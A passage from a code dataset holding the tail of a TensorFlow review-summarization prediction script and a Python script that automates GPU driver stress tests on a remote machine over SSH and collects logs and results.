= codecs.open(\"summaries\", \"w\", \"utf-8\")\n\n while not shouldEnd:\n input_x = graph.get_operation_by_name(\"inputs/x_input\").outputs[0]\n predict = graph.get_operation_by_name(\"score_layer/prediction\").outputs[0]\n resultlines = []\n loss_sum = 0\n count = 0\n # word_vocab, word_tensors, max_doc_length, label_tensors = \\\n # dr.load_test_v2(args.train_file, max_doc_length, max_sen_length)\n # word_vocab, word_tensors, max_doc_length, label_tensors, id_tensors = \\\n # dr.load_test_v3(args.train_file, max_doc_length, max_sen_length)\n 
word_vocab, word_tensors, max_doc_length, label_tensors, id_tensors, shouldEnd = \\\n                dr.load_from_fileList(fileList, write_index, max_doc_length, max_sen_length)\n            # test_reader = dr.DataReader(word_tensors['test'], label_tensors['test'],\n            #                            batch_size)\n            test_reader = dr.DataReader_v2(word_tensors['test'], label_tensors['test'],\n                                       id_tensors['test'], batch_size)\n\n            for x, y, z in test_reader.iter():\n                count += 1\n                x = x[0]\n                y = y[0]\n                # print (x)\n                y_ = sess.run(predict, feed_dict = {input_x : x})\n                # ys_ = sess.run(predict, feed_dict = {input_x, xs})\n                # for x, y, y_ in zip(xs[0], ys[0], ys_[0]):\n                max_len = 0\n                for i, item in enumerate(x):\n                    #print item\n                    temp = 0\n                    for sub_item in item:\n                        #print(type(int(sub_item)))\n                        if sub_item > 0:\n                            temp += 1\n                    #print temp\n                    if temp == 0:\n                        x = x[:i, :max_len]\n                        y_ = y_[:i]\n                        y = y[:i]\n                        break\n                    if temp > max_len:\n                        max_len = temp\n                x = x[:, :max_len]\n\n                tmp_str = ''\n                actual_length = 0\n                index = 0\n                out_flag = 0\n                top_sentence_index = numpy.argmax(y_)\n                # print(top_sentence_index)\n                # print(y_)\n                while len(tmp_str) < 10 and out_flag == 0:\n                    y_[top_sentence_index] = 1\n                    for word in x[top_sentence_index]:\n                        if word == 1:\n                            # tmp_str += str(y_[top_sentence_index]) + '\\t' + str(y[top_sentence_index]) + '\\t'\n                            continue\n                        elif word == 2:\n                            # tmp_str += '\\n'\n                            break\n                        else:\n                            tmp_str += str(word_vocab.token(word))\n                    if top_sentence_index == len(x) - 1:\n                        out_flag = 1\n                        # tmp_str += '\\n'\n                    elif len(tmp_str) < 10:\n                        top_sentence_index += 1\n                    else:\n                        out_flag = 1\n                resultlines.append(str(z)[1:-1] + '\\t' + tmp_str + \"\\n\")  # literal tab delimiter; no delimiter flag is ever defined\n                # f0.write(str(z)[1:-1] + '\\t' + tmp_str + '\\n')\n            # print(count)\n            # print(sub_task_id)\n            result_filename = FLAGS.predict_target_file + \"_\" + str(FLAGS.task_index) + \"_\" + str(sub_task_id)\n            if FLAGS.predict_incrementally == True:\n                result_filename = result_filename + \"_\" + str(datetime.date.today())\n            predict_target_file_f = tf.gfile.GFile(result_filename, 'w')\n            for result in resultlines:\n                predict_target_file_f.write(result)\n            predict_target_file_f.close()\n            write_index = write_index + FLAGS.line_per_file\n            sub_task_id = sub_task_id + 1\n\n        time_dif = timedelta(seconds=int(round(time.time() - time1)))\n        print(\"Time usage:\", time_dif)\n", "repo_name": "Snoopy666/Extractive-User-Review-Summaruzation-using-LSTM", "sub_path": "predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 8994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_boolean", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 44, "usage_type": "attribute"}, 
{"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.flags.DEFINE_boolean", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.flags", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.flags.DEFINE_boolean", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.flags", "line_number": 57, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.ListDirectory", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.Graph", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.ConfigProto", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.train.import_meta_graph", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 96, "usage_type": "attribute"}, {"api_name": "data_reader.load_from_fileList", "line_number": 111, "usage_type": "call"}, {"api_name": "data_reader.DataReader_v2", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 174, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.GFile", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 175, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 182, "usage_type": "call"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "34151617298", "text": "import math\r\nimport os\r\nimport shutil\r\nimport sys\r\nimport time\r\nimport multiprocessing\r\nfrom getpass import getpass\r\nfrom configparser import ConfigParser\r\nimport paramiko\r\nimport pandas as pd\r\nfrom multiprocessing import 
Process, Manager, Queue\r\nimport namednodes\r\nimport socket\r\nimport csv\r\nfrom datetime import datetime\r\nfrom paramiko.buffered_pipe import PipeTimeout\r\n\r\n## inits\r\nBASE_TEST_PATH=\"stress_automation/tests.csv\"\r\nBASE_PATH=\"C:\\Stress\"\r\nCSV_PATH = os.path.join(BASE_PATH,\"tests.csv\")\r\n\r\ndef logging(comb):\r\n\t#combination number?\r\n\t#comb = math.ceil(test_num/5)\r\n\t# create the log folder\r\n\tlogPath = os.path.join(BASE_PATH, 'logs', 'Combination' + str(comb))\r\n\tscandumpTag = 'Combination' + str(comb)\r\n\tprint(\" =========== In LOGGING function =========== \")\r\n\tos.chdir(logPath)\r\n\tlogName = \"PythonSV.log\"\r\n\tlog(r\"{0}\".format(logName))\r\n\tsv.gfxcard0.tiles.gfx.gtgp.force_wake=0x10001\r\n\tsv.gfxcard0.tiles.gfx.gtgp.driver_render_fwake=0x10001\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - IPEHR++++++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\tsv.gfxcard0.tiles.gfx.gtgp.showsearch(\"ipehr\")\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - INSTDONE+++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\tsv.gfxcard0.tiles.gfx.gtgp.showsearch(\"instdone_ccs\")\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - GTSTATUS+++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\timport pontevecchio.debug.domains.gfx.gt.gtStatus as gs\r\n\tgs.status()\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - SOC LOG++++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\timport pontevecchio.fv.ras.error_logging_modules.soc_error_log as soc\r\n\tsoc.soc_error_log()\r\n\tnolog()\r\n\r\n\tif sv.gfxcard0.tile0.taps.pvc_gdt0.debugid == 0 and sv.gfxcard0.tile1.taps.pvc_gdt0.debugid == 0:  # compare both tiles explicitly; bare 'and' applied the comparison to the second operand only\r\n\t\ttime.sleep(300)\r\n\r\n\tif sv.gfxcard0.tile0.taps.pvc_gdt0.debugid != 0 and sv.gfxcard0.tile1.taps.pvc_gdt0.debugid != 0:\r\n\t\tfrom pontevecchio.debug.domains.gfx.tools.scandump import pvcgfxscanAFD as pvcgfxscanAFD\r\n\t\tpvcgfxscanAFD.gtScandump(name=scandumpTag)\r\n\t\ttime.sleep(60)\r\n\telse:\r\n\t\tprint(\"TAP debugid is not proper. Skipping Scandump.\")\r\n\r\ndef checkTarget():\r\n\tTIMEOUT = 500\r\n\twhile TIMEOUT > 0:\r\n\t\tt = os.system('ping -n 4 {0} | find \"bytes=32\" > nul'.format(target))\r\n\t\tif t == 0:\r\n\t\t\tprint(\"Target is UP\")\r\n\t\t\treturn t\r\n\t\telse:\r\n\t\t\tprint(\"Trying to reach the target IP address\")\r\n\t\t\ttime.sleep(1)\r\n\t\t\tTIMEOUT=TIMEOUT-1\r\n\treturn t\r\n\r\n## boot system\r\ndef reset():\r\n\tMODE = \"driver\"\r\n\timport toolext.bootscript.boot as b\r\n\tb.clean_up_vars()\r\n\tstatus = exec(boot)\r\n\r\n\t#execute post boot sequence\r\n\texec(post_boot)\r\n\r\n\tprint(f\"Exited with status = {status}\")\r\n\tprint(\" =========== PythonSV based boot finished =========== \")\r\n\r\n\tstatus = checkTarget()\r\n\tif status == 0:\r\n\t\ttime.sleep(120)\r\n\t\tsshRun(MODE)\r\n\telse:\r\n\t\tprint(\"System is unreachable. 
Please check.\")\r\n\t\tsys.exit(1)\r\n\r\n\t#delay after driver load\r\n\ttime.sleep(120)\r\n\r\n\t#apply post driver load values\r\n\texec(post_driver)\r\n\r\n## get the csv to understand #tests; create the logs folder on target\r\ndef sshRun(MODE):\r\n\tglobal testsAvailable\r\n\r\n\ttry:\r\n\t\tssh = paramiko.SSHClient()\r\n\t\tssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\t\tssh.connect(target, 22, user, password)\r\n\texcept paramiko.AuthenticationException:\r\n\t\tprint(\"Authentication failed, please verify your credentials\")\r\n\t\tresult_flag = False\r\n\texcept paramiko.SSHException as sshException:\r\n\t\tprint(\"Could not establish SSH connection: %s\" % sshException)\r\n\t\tresult_flag = False\r\n\texcept socket.timeout as e:\r\n\t\tprint(\"Connection timed out\")\r\n\t\tresult_flag = False\r\n\texcept Exception as e:\r\n\t\tprint(\"Exception in connecting to the server\")\r\n\t\tprint(\"PYTHON SAYS:\",e)\r\n\t\tresult_flag = False\r\n\t\tssh.close()\r\n\telse:\r\n\t\tresult_flag = True\r\n\t\r\n\tif result_flag:\t\r\n\t\tif MODE == \"setup\":\r\n\t\t\t# get the test file\r\n\t\t\tsftp=ssh.open_sftp()\r\n\t\t\tsftp.get(BASE_TEST_PATH,'tests.csv')\r\n\t\t\tsftp.close()\r\n\t\t\t\r\n\t\t\t# get number of tests and setup log folder\r\n\t\t\tlist = pd.read_csv('tests.csv',encoding='cp1252')\r\n\t\t\trows = len(list.index)\r\n\t\t\ttestsAvailable = int(rows/6)\r\n\t\telif MODE == \"driver\":\r\n\t\t\tstdin, stdout, stderr = ssh.exec_command('sudo modprobe i915 enable_rc6=1 rc6_ignore_steppings=1 enable_iaf=0 reset=0 enable_hangcheck=0 enable_rps=1;if lsmod | grep i915; then echo \"Module Loaded\"; echo 300 | sudo tee /sys/class/drm/card1/gt/gt0/rps_min_freq_mhz; echo 300 | sudo tee /sys/class/drm/card1/gt/gt1/rps_min_freq_mhz; for i in /sys/class/drm/card*/engine/*/heartbeat_interval_ms; do echo 0 | sudo tee $i; done; for i in /sys/class/drm/card*/engine/*/preempt_timeout_ms; do echo 0 | sudo tee $i; done; for i in /sys/class/drm/card*/engine/*/max_busywait_duration_ns; do echo 0 | sudo tee $i; done; for i in /sys/class/drm/card*/engine/*/stop_timeout_ms; do echo 0 | sudo tee $i; done; else echo \"Module Not Loaded\"; while :; do echo \"Hit CTRL+C to stop \"; sleep 1; done; fi',get_pty=True)\r\n\t\t\tstdin.write(password)\r\n\t\t\tstdin.write(\"\\n\")\r\n\t\t\tstdin.flush()\r\n\t\telif MODE == \"driver_version\":\r\n\t\t\tstdin, stdout, stderr = ssh.exec_command('uname -a; sudo dpkg -l | grep intel',get_pty=True)\r\n\t\t\tstdin.write(password)\r\n\t\t\tstdin.write(\"\\n\")\r\n\t\t\tstdin.flush()\r\n\t\t\t#for line in iter(stdout.readline, \"\"):\r\n\t\t\t#\tlogging.debug(line)\r\n\t\telif MODE == \"dmesg\":\r\n\t\t\tstdin, stdout, stderr = ssh.exec_command('dmesg -wT',get_pty=True)\r\n\t\t\twith open('dmesg.log','a') as o:\r\n\t\t\t\torig_stdout = sys.stdout\r\n\t\t\t\tsys.stdout = o\r\n\t\t\t\tfor line in iter(stdout.readline,\"\"):\r\n\t\t\t\t\tprint(line.strip('\\n'))\r\n\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\to.close()\r\n\telse:\r\n\t\tos._exit(1)\r\n\r\ndef targetLog(q,test_num,args):\r\n\t#combination number?\r\n\tcomb = math.ceil(test_num/6)\r\n\t#create the log folder\r\n\tlogPath=os.path.join(BASE_PATH,'logs','Combination'+str(comb))\r\n\tif not os.path.isdir(logPath):\r\n\t\tos.makedirs(logPath)\r\n\r\n\tos.chdir(logPath)\r\n\r\n\twhile q.empty():\r\n\t\tMODE = \"dmesg\"\r\n\t\tsshRun(MODE)\r\n\r\ndef runTimer(q,args):\r\n\t##calculate timeout in seconds\r\n\ttimeout = args[3]\r\n\r\n\twhile timeout >= 0:\r\n\t\ttime.sleep(1)\r\n\t\ttimeout = 
timeout - 1\r\n\tq.put(1)\r\n\tprint(\"In timer, hit exit flag, exiting\")\r\n\tos._exit(1)\r\n\r\ndef create_resultsCsv():\r\n\tif os.path.exists('results.csv'):\r\n\t\tos.remove('results.csv')\r\n\theader = ['combination','testnumber', 'time', 'folder', 'command', 'iteration', 'status']\r\n\twith open('results.csv', 'w') as f:\r\n\t\t# create the csv writer\r\n\t\twriter = csv.writer(f)\r\n\t\t# write a row to the csv file\r\n\t\twriter.writerow(header)\r\n\t\tf.close()\r\n\r\ndef copy_to_excel(line):\r\n\tli = line.split(\",\")\r\n\tif(li[0]=='TEST_RESULT'):\r\n\t\tdel li[0]\r\n\t\tli = [x.replace(\"\\r\\n\",\"\") for x in li]\r\n\t\twith open('results.csv', 'a+') as f:\r\n\t\t# create the csv writer\r\n\t\t\twriter = csv.writer(f)\r\n\t\t# write a row to the csv file\r\n\t\t\twriter.writerow(li)\r\n\t\t\tf.close()\r\n\r\ndef runTests(q,test_num,args,MODE=None):\r\n\ttarget = args[0]\r\n\tuser = args[1]\r\n\tpassword = args[2]\r\n\r\n\ttry:\r\n\t\tssh = paramiko.SSHClient()\r\n\t\tssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\t\tssh.connect(target, 22, user, password)\r\n\texcept paramiko.AuthenticationException:\r\n\t\tprint(\"Authentication failed, please verify your credentials\")\r\n\t\tresult_flag = False\r\n\texcept paramiko.SSHException as sshException:\r\n\t\tprint(\"Could not establish SSH connection: %s\" % sshException)\r\n\t\tresult_flag = False\r\n\texcept socket.timeout as e:\r\n\t\tprint(\"Connection timed out\")\r\n\t\tresult_flag = False\r\n\texcept Exception as e:\r\n\t\tprint(\"Exception in connecting to the server\")\r\n\t\tprint(\"PYTHON SAYS:\",e)\r\n\t\tresult_flag = False\r\n\t\tssh.close()\r\n\telse:\r\n\t\tresult_flag = True\r\n\r\n\t# get number of tests and setup log folder\r\n\tdf = pd.read_csv(CSV_PATH,encoding='cp1252')\r\n\tcombination = df['combination'][test_num-1]\r\n\tfolder = df['folder'][test_num-1]\r\n\tcommand_line = df['command_line'][test_num-1]\r\n\tindex = df['testnumber'][test_num-1]\r\n\trun_status = df['runstatus'][test_num-1]\r\n\r\n\tif result_flag:\r\n\t\tif run_status != \"#\":\r\n\t\t\tlogPath = os.path.join(BASE_PATH, 'logs', 'Combination' + str(combination))\r\n\t\t\tos.chdir(logPath)\r\n\t\t\tlogFile = 'Test' + str(test_num) + \".log\"\r\n\t\t\tif MODE == \"dmesg\":\r\n\t\t\t\twhile q.empty():\r\n\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('dmesg -wT',get_pty=True)\r\n\t\t\t\t\twith open('dmesg.log','a') as o:\r\n\t\t\t\t\t\torig_stdout = sys.stdout\r\n\t\t\t\t\t\tsys.stdout = o\r\n\t\t\t\t\t\tfor line in iter(stdout.readline,\"\"):\r\n\t\t\t\t\t\t\tprint(line.strip('\\n'))\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\to.close()\r\n\t\t\telse:\r\n\t\t\t\tcount = 1\r\n\t\t\t\twhile q.empty():\r\n\t\t\t\t\ttimestamp = str(datetime.now())\r\n\t\t\t\t\tresult = \"TEST STARTED\"\r\n\t\t\t\t\tprint(\"Combination: %s Test number: %s Time: %s Command: %s Iteration: %s Status: %s\" % (combination,test_num,timestamp,command_line,count,result))\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tif folder.find('binocle') != -1:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('export UseDrmVirtualEnginesForCcs=0; cd {0};{1}'.format(folder, command_line), timeout=900, get_pty=True)\r\n\t\t\t\t\t\telif folder.find('OpenCV') != -1:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('cd {0}; export LD_LIBRARY_PATH=$PWD; {1}'.format(folder, command_line), timeout=900, get_pty=True)\r\n\t\t\t\t\t\telif folder.find('HCPBench') != -1:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('cd {0}; cd ../HCPBenchSYCLlib; 
export LD_LIBRARY_PATH=$PWD; cd {1}; {2}'.format(folder, folder, command_line), timeout=900, get_pty = True)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('cd {0};{1}'.format(folder, command_line), timeout=900, get_pty=True)\r\n\t\t\t\t\t\tcopy_to_excel(\"TEST_RESULT,\" + str(combination) + \",\" + str(test_num) + \",\" + timestamp + \",\" + folder + \",\" + command_line + \",\" + str(count) + \",\" + result + \"\")\r\n\t\t\t\t\t\twith open(logFile, 'a') as o:\r\n\t\t\t\t\t\t\torig_stdout = sys.stdout\r\n\t\t\t\t\t\t\tsys.stdout = o\r\n\t\t\t\t\t\t\tfor line in iter(stdout.readline,\"\"):\r\n\t\t\t\t\t\t\t\tprint(line.strip('\\n'))\r\n\t\t\t\t\t\t\tvalue = stdout.channel.recv_exit_status()\r\n\t\t\t\t\t\t\tif value != 0:\r\n\t\t\t\t\t\t\t\tresult = \"TEST FAILED\"\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tresult = \"TEST PASSED\"\r\n\t\t\t\t\t\t\tprint(\"Combination: %s Test number: %s Time: %s Command: %s Iteration: %s Status: %s\" % (combination,test_num,timestamp,command_line,count,result))\r\n\t\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\t\to.close()\r\n\t\t\t\t\t\t\ttimestamp = str(datetime.now())\r\n\t\t\t\t\t\t\tprint(\"Combination: %s Test number: %s Time: %s Command: %s Iteration: %s Status: %s\" % (combination,test_num,timestamp,command_line,count,result))\r\n\t\t\t\t\t\t\tcopy_to_excel(\"TEST_RESULT,\" + str(combination) + \",\" + str(test_num) + \",\" + timestamp + \",\" + folder + \",\" + command_line + \",\" + str(count) + \",\" + result + \"\")\r\n\t\t\t\t\texcept socket.timeout as e:\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\tprint(\"Connection timed out\")\r\n\t\t\t\t\t\tos._exit(1)\r\n\t\t\t\t\texcept PipeTimeout:\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\tprint(\"Connection timed out\")\r\n\t\t\t\t\t\tos._exit(1)\r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\tprint(\"Exception in execute command\")\r\n\t\t\t\t\t\tprint(\"PYTHON SAYS:\", e)\r\n\t\t\t\t\t\tos._exit(1)\r\n\t\t\t\t\tcount += 1\r\n\tos._exit(1)\r\n\r\ndef run():\r\n\tglobal comb_from\r\n\tglobal comb_to\r\n\targs = [target,user,password,totalTime]\r\n\tprocesses = []\r\n\r\n\treset()\r\n\t\r\n\tlist = pd.read_csv(CSV_PATH,encoding='cp1252')\r\n\trows = len(list.index)\r\n\ttestsAvailable = int(rows/6)\r\n\r\n\tq = multiprocessing.Queue()\r\n\r\n\tif (comb_to >= comb_from) and (comb_to <= testsAvailable):\r\n\t\twhile comb_from <= comb_to:\r\n\t\t\ttest_num = comb_from*6 - 5\r\n\t\t\ttest_to = comb_from*6\r\n\t\t\t#cleanup combination logs\r\n\t\t\tlogPath = os.path.join(BASE_PATH, 'logs', 'Combination' + str(comb_from))\r\n\t\t\tif os.path.exists(logPath):\r\n\t\t\t\tshutil.rmtree(logPath)\r\n\r\n\t\t\tos.makedirs(logPath)\r\n\t\t\tos.chdir(logPath)\r\n\t\t\tcreate_resultsCsv()\r\n\r\n\t\t\tfor i in range(test_num,test_to+1):\r\n\t\t\t\tstartTest = multiprocessing.Process(target=runTests,args=(q,i,args))\r\n\t\t\t\tstartTest.start()\r\n\t\t\t\tprocesses.append(startTest)\r\n\r\n\t\t\t#MODE = \"dmesg\"\r\n\t\t\t#startLog = multiprocessing.Process(target=runTests, args=(q, test_num, args, MODE))\r\n\t\t\t#startLog.start()\r\n\r\n\t\t\tstartTimer = multiprocessing.Process(target=runTimer,args=(q,args))\r\n\t\t\tstartTimer.start()\r\n\r\n\t\t\t#startLog.join()\r\n\t\t\tfor startTest in processes:\r\n\t\t\t\tstartTest.join()\r\n\t\t\tstartTimer.join()\r\n\r\n\t\t\t# check if the IP is reachable\r\n\t\t\tstatus = checkTarget()\r\n\t\t\tif status != 
0:\r\n\t\t\t\tlogging(comb_from)\r\n\t\t\t\treset()\r\n\t\t\t\r\n\t\t\tprint(\"Waiting for 5 mins before taking logs\")\r\n\t\t\ttime.sleep(300)\r\n\t\t\tlogging(comb_from)\r\n\r\n\t\t\t#terminate\r\n\t\t\t#startLog.terminate()\r\n\t\t\tstartTimer.terminate()\r\n\t\t\tfor startTest in processes:\r\n\t\t\t\tstartTest.terminate()\r\n\t\t\treset()\r\n\t\t\tcomb_from +=1\r\n\r\n\t\t\t#clear queue\r\n\t\t\twhile not q.empty():\r\n\t\t\t\tq.get()\r\n\telse:\r\n\t\tprint(\"Please check test combinations in config.ini file\")\r\n\r\nif __name__ == \"__main__\":\r\n\t# instantiate\r\n\tconfig = ConfigParser()\r\n\r\n\t# parse existing file\r\n\tconfig.read('config.ini')\r\n\r\n\t# read contents of config.ini\r\n\tdict = {}\r\n\r\n\tfor sec in config.sections():\r\n\t\tfor item in config.items(sec):\r\n\t\t\tdict[item[0]] = item[1]\r\n\r\n\t# read values from a section\r\n\ttarget = config.get('SYSTEM-INFO', 'target')\r\n\tuser = config.get('SYSTEM-INFO', 'user')\r\n\tproject = config.get('SYSTEM-INFO', 'project')\r\n\thours = config.getint('TEST-PARAMS', 'hour')\r\n\tminutes = config.getint('TEST-PARAMS', 'minute')\r\n\tcomb_from = config.getint('TEST-PARAMS', 'comb_from')\r\n\tcomb_to = config.getint('TEST-PARAMS', 'comb_to')\r\n\tboot = dict.get('boot').strip('\\n')\r\n\tpost_boot = dict.get('post_boot').strip('\\n')\r\n\tpost_driver = dict.get('post_driver').strip('\\n')\r\n\r\n\tprint(\"Target:\", target)\r\n\tprint(\"User:\", user)\r\n\tprint(\"Project:\", project)\r\n\tprint(\"Hours:\", hours)\r\n\tprint(\"Minutes:\", minutes)\r\n\tprint(\"Test from:\", comb_from)\r\n\tprint(\"Test to:\", comb_to)\r\n\r\n\tinput = input(\"Is this configuration OK to proceed (Y/N)?\")\r\n\r\n\tif input == \"Y\" or input == \"y\":\r\n\t\tprint(\"Configuration is OK to proceed. Continuing.\")\r\n\telse:\r\n\t\tprint(\"Invalid input. 
Please try again!\")\r\n\t\tsys.exit(1)\r\n\r\n\t##calculate timeout in seconds\r\n\ttotalTime = (hours * 3600) + (minutes * 60)\r\n\r\n\tpassword = getpass(prompt='Input your target password: ')\r\n\r\n\t# TODO: read from config\r\n\tPYSV_PROJECT = 'pontevecchio'\r\n\tPYSV_REPO = fr\"C:\\pythonsv\\{PYSV_PROJECT}\"\r\n\tsys.path.append(PYSV_REPO)\r\n\tos.chdir(PYSV_REPO)\r\n\tfrom startpvc import *\r\n\tfrom common import baseaccess\r\n\r\n\tif baseaccess.getaccess() != 'tssa':\r\n\t\timport itpii\r\n\r\n\t\titp = itpii.baseaccess()\r\n\r\n\titp.unlock()\r\n\r\n\timport startpvc_auto\r\n\r\n\tstartpvc_auto.auto_main()\r\n\r\n\trun()\r\n\tsys.exit(0)\r\n", "repo_name": "sandeep-stack/my_data", "sub_path": "stressRun.py", "file_name": "stressRun.py", "file_ext": "py", "file_size_in_byte": 14330, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 30, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.gt.gtStatus.status", "line_number": 44, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.gt.gtStatus", "line_number": 44, "usage_type": "name"}, {"api_name": "pontevecchio.fv.ras.error_logging_modules.soc_error_log.soc_error_log", "line_number": 48, "usage_type": "call"}, {"api_name": "pontevecchio.fv.ras.error_logging_modules.soc_error_log", "line_number": 48, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.tools.scandump.pvcgfxscanAFD.gtScandump", "line_number": 56, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.tools.scandump.pvcgfxscanAFD", "line_number": 56, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 57, "usage_type": "call"}, {"api_name": "os.system", "line_number": 64, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 70, "usage_type": "call"}, {"api_name": "toolext.bootscript.boot.clean_up_vars", "line_number": 78, "usage_type": "call"}, {"api_name": "toolext.bootscript.boot", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "paramiko.SSHClient", "line_number": 106, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 107, "usage_type": "call"}, {"api_name": "paramiko.AuthenticationException", "line_number": 109, "usage_type": "attribute"}, {"api_name": "paramiko.SSHException", "line_number": 112, "usage_type": "attribute"}, {"api_name": "socket.timeout", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 134, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 159, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": 
